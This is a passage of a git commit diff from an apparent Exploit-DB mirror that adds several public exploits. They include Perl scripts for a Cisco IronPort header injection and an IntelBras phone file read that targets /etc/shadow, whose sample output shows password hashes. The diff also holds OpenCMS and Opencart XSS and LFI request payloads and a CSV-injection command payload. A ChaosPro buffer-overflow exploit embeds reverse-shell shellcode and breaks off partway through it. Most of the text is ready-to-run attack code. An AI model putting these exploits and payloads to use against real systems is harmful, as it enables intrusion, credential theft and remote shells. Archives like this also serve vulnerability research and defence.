DB: 2019-09-03
12 changes to exploits/shellcodes ChaosPro 2.0 - SEH Buffer Overflow ChaosPro 2.1 - SEH Buffer Overflow ChaosPro 3.1 - SEH Buffer Overflow Kaseya VSA agent 9.5 - Privilege Escalation Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read Opencart 3.x - Cross-Site Scripting Wordpress Plugin Event Tickets 4.10.7.1 - CSV Injection Alkacon OpenCMS 10.5.x - Cross-Site Scripting Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2) Alkacon OpenCMS 10.5.x - Local File inclusion Craft CMS 2.7.9/3.2.5 - Information Disclosure
This commit is contained in:
parent
b4225f5fa8
commit
bc4836bfc1
13 changed files with 1068 additions and 0 deletions
51
exploits/hardware/remote/47329.pl
Executable file
51
exploits/hardware/remote/47329.pl
Executable file
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/perl -w
|
||||
#
|
||||
#
|
||||
# Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection
|
||||
#
|
||||
#
|
||||
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
|
||||
#
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
|
||||
# caused by direct or indirect use of the information or functionality provided by these programs.
|
||||
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
|
||||
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
|
||||
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
use strict;
|
||||
use HTTP::Request;
|
||||
use LWP::UserAgent;
|
||||
use WWW::UserAgent::Random;
|
||||
use HTTP::CookieJar::LWP;
|
||||
|
||||
|
||||
my $host = shift || 'https://192.168.1.1:443/';
|
||||
|
||||
print ("[+] Cisco (Titsco) Email Security Appliance (IronPort) C160 Header 'Host' Injection\n");
|
||||
print ("===================================================================================\n");
|
||||
print ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
|
||||
print ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);
|
||||
|
||||
my $user_agent = rand_ua("browsers");
|
||||
my $jar = HTTP::CookieJar::LWP->new();
|
||||
my $browser = LWP::UserAgent->new(
|
||||
protocols_allowed => ['http', 'https'],
|
||||
ssl_opts => { verify_hostname => 0 }
|
||||
);
|
||||
$browser->timeout(10);
|
||||
$browser->cookie_jar($jar);
|
||||
$browser->agent($user_agent);
|
||||
|
||||
my $request = HTTP::Request->new (POST => $host,
|
||||
[ Content_Type => "application/x-www-form-urlencoded" ,
|
||||
Referer => $host], " ");
|
||||
$request->header("Host" => "Header-Injection");
|
||||
my $content = $browser->request($request);
|
||||
print $content->headers_as_string();
|
102
exploits/hardware/remote/47337.pl
Executable file
102
exploits/hardware/remote/47337.pl
Executable file
|
@ -0,0 +1,102 @@
|
|||
#!/usr/bin/perl -w
|
||||
#
|
||||
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
|
||||
#
|
||||
# Todor Donev 2019 (c) <todor.donev at gmail.com>
|
||||
#
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
|
||||
# caused by direct or indirect use of the information or functionality provided by these programs.
|
||||
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
|
||||
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
|
||||
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
# [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl
|
||||
#
|
||||
# # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
|
||||
# # ========================================================================================================
|
||||
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
|
||||
# # ========================================================================================================
|
||||
# # > Authorization => Basic dXNlcjp1c2Vy
|
||||
# # > User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
|
||||
# # > Content-Type => application/x-www-form-urlencoded
|
||||
# # < Accept-Ranges => bytes
|
||||
# # < Server => SIPPhone
|
||||
# # < Content-Type => text/html;charset=UTF-8
|
||||
# # < Expires => -1
|
||||
# # < Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
|
||||
# # < Client-Peer => 192.168.1.1
|
||||
# # < Client-Response-Num => 1
|
||||
# # ========================================================================================================
|
||||
# root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
|
||||
# admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
|
||||
# guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
|
||||
#
|
||||
# # ========================================================================================================
|
||||
# [test@localhost intelbras]$
|
||||
#
|
||||
# Simple Mode:
|
||||
# perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
|
||||
#
|
||||
use strict;
|
||||
use v5.10;
|
||||
use HTTP::Request;
|
||||
use LWP::UserAgent;
|
||||
use WWW::UserAgent::Random;
|
||||
|
||||
my $host = shift || '';
|
||||
my $file = shift || '/etc/shadow';
|
||||
my $user = shift || 'user';
|
||||
my $pass = shift || 'user';
|
||||
|
||||
print "
|
||||
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
|
||||
# ========================================================================================================
|
||||
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
|
||||
";
|
||||
if ($host !~ m/^http/){
|
||||
print "# e.g. perl $0 https://target:port/ /etc/shadow user user
|
||||
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
|
||||
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
|
||||
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
|
||||
";
|
||||
exit;
|
||||
}
|
||||
|
||||
my $user_agent = rand_ua("browsers");
|
||||
my $browser = LWP::UserAgent->new(
|
||||
protocols_allowed => ['http', 'https'],
|
||||
ssl_opts => { verify_hostname => 0 }
|
||||
);
|
||||
$browser->timeout(10);
|
||||
$browser->agent($user_agent);
|
||||
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
|
||||
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
|
||||
$request->authorization_basic($user, $pass);
|
||||
print "# ========================================================================================================\n";
|
||||
my $response = $browser->request($request);
|
||||
say "# > $_ => ", $request->header($_) for $request->header_field_names;
|
||||
say "# < $_ => ", $response->header($_) for $response->header_field_names;
|
||||
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
|
||||
print "# ========================================================================================================\n";
|
||||
|
||||
if ($response->content =~ m/$file/g){
|
||||
|
||||
my $content = $response->content;
|
||||
$content =~ s/$file//g;
|
||||
$content =~ s/^\n+//;
|
||||
print $content;
|
||||
print "\n# ========================================================================================================\n";
|
||||
exit;
|
||||
|
||||
} else {
|
||||
|
||||
print "# Exploit failed or full path is wrong..\n";
|
||||
exit;
|
||||
|
||||
}
|
30
exploits/multiple/webapps/47338.txt
Normal file
30
exploits/multiple/webapps/47338.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
|
||||
# Google Dork: N/A
|
||||
# Date: 18/07/2019
|
||||
# Exploit Author: Aetsu
|
||||
# Vendor Homepage: http://www.opencms.org
|
||||
# Software Link: https://github.com/alkacon/apollo-template
|
||||
# Version: 10.5.x
|
||||
# Tested on: 10.5.5 / 10.5.4
|
||||
# CVE : CVE-2019-13234, CVE-2019-13235
|
||||
|
||||
1. Reflected XSS in the search engine:
|
||||
- Affected resource -> "q"
|
||||
POC:
|
||||
```
|
||||
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
|
||||
```
|
||||
2. Reflected XSS in login form:
|
||||
POC:
|
||||
The vulnerability appears when the header X-Forwarded-For is used as shown
|
||||
in the next request:
|
||||
```
|
||||
GET
|
||||
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
|
||||
HTTP/1.1
|
||||
Host: example.com
|
||||
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
|
||||
```
|
||||
|
||||
|
||||
Extended POCs: https://aetsu.github.io/OpenCms
|
135
exploits/multiple/webapps/47339.txt
Normal file
135
exploits/multiple/webapps/47339.txt
Normal file
|
@ -0,0 +1,135 @@
|
|||
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms
|
||||
Site Management
|
||||
# Google Dork: N/A
|
||||
# Date: 18/07/2019
|
||||
# Exploit Author: Aetsu
|
||||
# Vendor Homepage: http://www.opencms.org
|
||||
# Software Link: https://github.com/alkacon/opencms-core
|
||||
# Version: 10.5.x
|
||||
# Tested on: 10.5.5 / 10.5.4
|
||||
# CVE : CVE-2019-13236
|
||||
|
||||
1. In Site Management > New site (Stored XSS):
|
||||
- Affected resource title.0:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/sites/new.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se
|
||||
```
|
||||
2. In Treeview (Reflected XSS):
|
||||
- Affected resource type:
|
||||
POC:
|
||||
```
|
||||
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=
|
||||
</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=
|
||||
```
|
||||
3. In Workspace tools > Login message (Stored XSS):
|
||||
- Affected resource message.0:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
enabled.0=true&enabled.0.value=true&message.0=<svg
|
||||
onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=
|
||||
```
|
||||
4. In Index sources > View index sources > New index source (Stored XSS):
|
||||
- Affected resource name.0:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=
|
||||
```
|
||||
5. In Index sources > View field configuration > New field configuration
|
||||
(Stored XSS):
|
||||
- Affected resource name.0:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=
|
||||
```
|
||||
6. In Account Management > Impor/Export user data (Reflected XSS):
|
||||
- Affected resource oufqn:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp
|
||||
HTTP/1.1
|
||||
Host: example.com
|
||||
groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=
|
||||
```
|
||||
7. In Account Management > Group Management > New Group (Stored XSS):
|
||||
- Affected resources name.0 and description.0:
|
||||
POC:```
|
||||
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27
|
||||
```
|
||||
8. In Account Management > Organizational Unit > Organizational Unit
|
||||
Management > New sub organizational unit (Stored XSS):
|
||||
- Affected resources parentOuDesc.0 and resources.0:
|
||||
POC:```
|
||||
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
|
||||
```
|
||||
9. In Link Validator > External Link Validator > Validate External Links
|
||||
(Reflected XSS):
|
||||
- Affected resources reporttype, reportcontinuekey and title:
|
||||
POC:```
|
||||
POST
|
||||
/system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks
|
||||
HTTP/1.1
|
||||
Host: example.com
|
||||
dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
|
||||
```
|
||||
10. In Administrator view > Database management > Extended html import >
|
||||
Default html values (Reflected XSS):
|
||||
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0,
|
||||
downloadGallery.0:
|
||||
POC:```
|
||||
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
|
||||
Content-Disposition: form-data; name="inputDir.0"
|
||||
.
|
||||
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
|
||||
Content-Disposition: form-data; name="destinationDir.0"
|
||||
/whbo0"><script>alert(1)</script>nrbhd
|
||||
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
|
||||
Content-Disposition: form-data; name="imageGallery.0"
|
||||
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
|
||||
Content-Disposition: form-data; name="downloadGallery.0"
|
||||
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
|
||||
Content-Disposition: form-data; name="linkGallery.0"
|
||||
[...]
|
||||
```
|
||||
11. In Administrator view > Database management > Extended html import >
|
||||
Default html values (Reflected XSS):
|
||||
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and
|
||||
downloadGallery.0:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
------WebKitFormBoundary6fy3ENawtXT0qmgB
|
||||
Content-Disposition: form-data; name="inputDir.0"
|
||||
gato
|
||||
------WebKitFormBoundary6fy3ENawtXT0qmgB
|
||||
Content-Disposition: form-data; name="destinationDir.0"
|
||||
testszfgw"><script>alert(1)</script>vqln7
|
||||
------WebKitFormBoundary6fy3ENawtXT0qmgB
|
||||
Content-Disposition: form-data; name="imageGallery.0"
|
||||
test
|
||||
------WebKitFormBoundary6fy3ENawtXT0qmgB
|
||||
Content-Disposition: form-data; name="downloadGallery.0"
|
||||
test
|
||||
------WebKitFormBoundary6fy3ENawtXT0qmgB
|
||||
Content-Disposition: form-data; name="linkGallery.0"
|
||||
test
|
||||
[...]
|
||||
```
|
||||
|
||||
|
||||
Extended POCs: https://aetsu.github.io/OpenCms
|
56
exploits/multiple/webapps/47340.txt
Normal file
56
exploits/multiple/webapps/47340.txt
Normal file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms
|
||||
Site Management
|
||||
# Google Dork: N/A
|
||||
# Date: 18/07/2019
|
||||
# Exploit Author: Aetsu
|
||||
# Vendor Homepage: http://www.opencms.org
|
||||
# Software Link: https://github.com/alkacon/opencms-core
|
||||
# Version: 10.5.x
|
||||
# Tested on: 10.5.5 / 10.5.4
|
||||
# CVE : CVE-2019-13237
|
||||
|
||||
For the tests, I used the payloads:
|
||||
```
|
||||
…%2f…%2fWEB-INF%2flogs%2fopencms.log
|
||||
…%2f…%2fWEB-INF%2fweb.xml
|
||||
```
|
||||
|
||||
1. Affected resource closelink:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
enabled.0=true&enabled.0.value=true&message.0=%3Cimg+src%3D.+onerror%3Dalert%281%29%3E%0D%0A&loginForbidden.0.value=false&timeStart.0=1%2F3%2F2000+12%3A00+AM&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
|
||||
```
|
||||
2. Affected resource closelink:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/contenttools/reports/xmlcontentrepair.jsp
|
||||
HTTP/1.1
|
||||
Host: example.com
|
||||
reporttype=extended&reportcontinuekey=&thread=dcbb6737-661b-11e9-a9fc-0242ac11002b&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=Ok
|
||||
```
|
||||
3. Affected resource closelink:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27%29%3E&assignedOu.0=root+organizational+unit+%28%2F%29&enabled.0=true&enabled.0.value=true&ok=Ok&oufqn=&elementname=undefined&path=%252Faccounts%252Forgunit%252Fgroups%252Fnew&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
|
||||
```
|
||||
4. Affected resource closelink:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/history/settings/index.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
versions.0=10&mode.0=2&ok=OK&elementname=undefined&path=%252Fhistory%252Fsettings&elementindex=0&action=save&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&page=page1&framename=
|
||||
```
|
||||
5. Affected resource closelink:
|
||||
POC:
|
||||
```
|
||||
POST /system/workplace/admin/history/reports/clearhistory.jsp HTTP/1.1
|
||||
Host: example.com
|
||||
reporttype=extended&reportcontinuekey=&thread=ac0bbd5f-66cd-11e9-ae09-0242ac11002b&classname=org.opencms.workplace.tools.history.CmsHistoryClearDialog&threadhasnext=false&action=reportend&closelink=..%2f..%2fWEB-INF%2fweb.xml&style=new&ok=OK
|
||||
```
|
||||
|
||||
|
||||
Extended POCs: https://aetsu.github.io/OpenCms
|
24
exploits/php/webapps/47331.txt
Normal file
24
exploits/php/webapps/47331.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: Opencart 3.x.x Authenticated Stored XSS
|
||||
# Date: 08/15/2019
|
||||
# Exploit Author: Nipun Somani
|
||||
# Author Web: http://thehackerstore.net
|
||||
# Vendor Homepage: https://www.opencart.com/
|
||||
# Software Link: https://github.com/opencart/opencart
|
||||
# Version: 3.x.x
|
||||
# Tested on: Debian 9, Windows 10 x64
|
||||
# CVE : CVE-2019-15081
|
||||
|
||||
|
||||
Description:
|
||||
The Opencart Version 3.x.x allows editing Source/HTML of the Categories /
|
||||
Product / Information pages in the admin panel which isn't sanitized to
|
||||
user input allowing for an attacker to execute arbitrary javascript code
|
||||
leading to Stored Cross-Site-Scripting(XSS).
|
||||
|
||||
Proof-of-Concept(POC):
|
||||
|
||||
1. Log-in to admin-panel.
|
||||
2. Navigate to Catlog and then select any of [Categories or Products or Information] options and and pick any entry or create one.
|
||||
3. Under description click on Source option and insert your XSS payload.
|
||||
i.e: "><script>alert("XSS")</script>
|
||||
4. Now visit the modified page of your public website. And your injected XSS payload will execute.
|
33
exploits/php/webapps/47335.txt
Normal file
33
exploits/php/webapps/47335.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: WordPress Plugin Event Tickets >= 4.10.7.1 - CSV Injection
|
||||
# Google Dork: inurl:"\wp-content\plugins\event-tickets"
|
||||
# Date: 09-01-2019
|
||||
# Exploit Author: MTK (http://mtk911.cf/)
|
||||
# Vendor Homepage: https://tri.be/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip
|
||||
# Version: Up to v4.107.1
|
||||
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows
|
||||
|
||||
# Software description:
|
||||
Event Tickets provides a simple way for visitors to RSVP or purchase tickets to your events. As a standalone plugin, it enables you to add RSVPs or tickets to posts or pages. When paired with The Events Calendar, you can add that same functionality directly to your event listings.
|
||||
|
||||
# Technical Details & Impact:
|
||||
It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source.
|
||||
|
||||
# POC
|
||||
|
||||
1. Visit RSVP ticket enabled page
|
||||
2. In Full name section add payload for CSV injection e.g.
|
||||
=cmd|'/C ping -t 127.0.0.1'!A0
|
||||
3. Login into WordPress and visit event details in All Post> Ticketed > Attendees.
|
||||
4. Export Attendees list (.csv format).
|
||||
5. Opening the file will execute malicious payload (command) on user system
|
||||
|
||||
|
||||
# Timeline
|
||||
02-08-2019 - Vulnerability discovered
|
||||
02-08-2019 - Vendor contacted
|
||||
02-08-2019 - Vendor responded
|
||||
02-08-2019 - Detailed report shared
|
||||
02-18-2019 - Contacted vendor on fixation status without any response
|
||||
08-26-2019 - Full disclosure timeline given without any response
|
||||
09-01-2019 - Full Disclosure
|
61
exploits/php/webapps/47343.txt
Normal file
61
exploits/php/webapps/47343.txt
Normal file
|
@ -0,0 +1,61 @@
|
|||
# Exploit Title : CraftCms Users information disclosure From uploaded File
|
||||
# Author [Discovered By] : Mohammed Abdul Raheem
|
||||
# Author's [Company Name] : TrekShield IT Solution
|
||||
# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
|
||||
# Found Vulnerability On : 20-07-2019
|
||||
# Vendor Homepage:https://craftcms.com/
|
||||
# Software Information Link: https://github.com/craftcms/demo
|
||||
# Software Affected Versions : CraftCms v2 before 2.7.10 and CraftCmsv3 before 3.2.6
|
||||
# Tested On : Windows and Linux
|
||||
# Category : WebApps
|
||||
# Exploit Risk : Medium
|
||||
# Vulnerability Type : Sensitive information disclosure
|
||||
# CVE : CVE-2019-14280
|
||||
####################################################################
|
||||
|
||||
# Description about Software :
|
||||
***************************
|
||||
Craft is a flexible, user-friendly CMS for creating custom digital
|
||||
experiences on the web and beyond.
|
||||
|
||||
####################################################################
|
||||
|
||||
# Vulnerability Description :
|
||||
*****************************
|
||||
|
||||
When a user uploads an image in CraftCMS, the uploaded image's EXIF
|
||||
Geolocation Data does not gets stripped. As a result, anyone can get
|
||||
sensitive information of CraftCMS's users like their Geolocation,
|
||||
their Device information like Device Name, Version, Software &
|
||||
Software version used etc.
|
||||
|
||||
# Impact :
|
||||
***********
|
||||
|
||||
This vulnerability is CRITICAL and impacts all the craft's customer
|
||||
base. This vulnerability violates the privacy of a User and shares
|
||||
sensitive information of the user who uploads an image on CraftCMS.
|
||||
|
||||
# Steps To Validate :
|
||||
*********************
|
||||
|
||||
1. Login to CraftCMS account.
|
||||
2. Go to endpoint https://demo.craftcms.com/<token>/s/admin/assets
|
||||
3. Upload an image which has EXIF Geolocation Data in it.
|
||||
4. Once the image is uploaded by CraftCMS and hosted on the server,
|
||||
download the image file and check the File Properties. You can also
|
||||
use a tool like to view user's information: https://www.pic2map.com
|
||||
|
||||
# ATTACHED POC :
|
||||
****************
|
||||
|
||||
https://youtu.be/s-fTdu8R3bU
|
||||
|
||||
# More Information Can be find here :
|
||||
*************************************
|
||||
|
||||
https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#326---2019-07-23
|
||||
|
||||
###################################################################
|
||||
|
||||
# Discovered By Mohammed Abdul Raheem from TrekShield.com
|
98
exploits/windows/local/47332.py
Executable file
98
exploits/windows/local/47332.py
Executable file
|
@ -0,0 +1,98 @@
|
|||
#!C:\Python27\python.exe
|
||||
|
||||
# Title : ChaosPro 2.0
|
||||
# Twitter : @securitychops
|
||||
# Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html
|
||||
|
||||
#this needs to be a backwards jump to give us room to call stack jump code
|
||||
jmpback80 = "\x40\x75\x80\x75"
|
||||
jmpforward06 = "\x40\x75\x06\x75"
|
||||
|
||||
# our egghunter shellcode
|
||||
egghunter = (
|
||||
"\x66\x81\xca\xff\x0f\x42\x52\x31\xdb\x43"
|
||||
"\x43\x53\x58\xcd\x2e\x3c\x05\x5a\x74\xec"
|
||||
"\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xe7"
|
||||
"\xaf\x75\xe4\xff\xe7"
|
||||
)
|
||||
|
||||
# our egg!
|
||||
payload = "T00WT00W"
|
||||
|
||||
#the payload
|
||||
payload += (
|
||||
# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.7.17
|
||||
# LPORT=4444 -e x86/alpha_upper -a x86 --platform windows -f c -b '\x00'
|
||||
"\x89\xe1\xdb\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
|
||||
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
|
||||
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
|
||||
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
|
||||
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4c\x42\x53\x30"
|
||||
"\x33\x30\x43\x30\x55\x30\x4b\x39\x4b\x55\x46\x51\x4f\x30\x32"
|
||||
"\x44\x4c\x4b\x56\x30\x56\x50\x4c\x4b\x46\x32\x54\x4c\x4c\x4b"
|
||||
"\x50\x52\x45\x44\x4c\x4b\x34\x32\x37\x58\x44\x4f\x4f\x47\x30"
|
||||
"\x4a\x36\x46\x30\x31\x4b\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c"
|
||||
"\x44\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x34\x4d\x45\x51\x39"
|
||||
"\x57\x4b\x52\x4c\x32\x56\x32\x31\x47\x4c\x4b\x46\x32\x32\x30"
|
||||
"\x4c\x4b\x50\x4a\x47\x4c\x4c\x4b\x30\x4c\x32\x31\x52\x58\x4b"
|
||||
"\x53\x31\x58\x53\x31\x4e\x31\x36\x31\x4c\x4b\x50\x59\x37\x50"
|
||||
"\x45\x51\x58\x53\x4c\x4b\x47\x39\x35\x48\x4d\x33\x37\x4a\x30"
|
||||
"\x49\x4c\x4b\x57\x44\x4c\x4b\x53\x31\x49\x46\x46\x51\x4b\x4f"
|
||||
"\x4e\x4c\x39\x51\x58\x4f\x54\x4d\x45\x51\x4f\x37\x36\x58\x4d"
|
||||
"\x30\x33\x45\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d"
|
||||
"\x56\x44\x42\x55\x5a\x44\x31\x48\x4c\x4b\x46\x38\x31\x34\x35"
|
||||
"\x51\x4e\x33\x35\x36\x4c\x4b\x34\x4c\x30\x4b\x4c\x4b\x56\x38"
|
||||
"\x45\x4c\x55\x51\x38\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x38"
|
||||
"\x50\x4d\x59\x51\x54\x46\x44\x56\x44\x31\x4b\x31\x4b\x43\x51"
|
||||
"\x31\x49\x50\x5a\x30\x51\x4b\x4f\x4b\x50\x51\x4f\x31\x4f\x51"
|
||||
"\x4a\x4c\x4b\x32\x32\x4a\x4b\x4c\x4d\x31\x4d\x42\x48\x47\x43"
|
||||
"\x57\x42\x53\x30\x55\x50\x35\x38\x53\x47\x43\x43\x30\x32\x31"
|
||||
"\x4f\x31\x44\x33\x58\x30\x4c\x33\x47\x57\x56\x54\x47\x4b\x4f"
|
||||
"\x49\x45\x48\x38\x4a\x30\x35\x51\x43\x30\x35\x50\x56\x49\x59"
|
||||
"\x54\x36\x34\x36\x30\x52\x48\x56\x49\x4b\x30\x52\x4b\x35\x50"
|
||||
"\x4b\x4f\x59\x45\x30\x50\x56\x30\x56\x30\x46\x30\x51\x50\x36"
|
||||
"\x30\x57\x30\x46\x30\x55\x38\x4a\x4a\x54\x4f\x39\x4f\x4b\x50"
|
||||
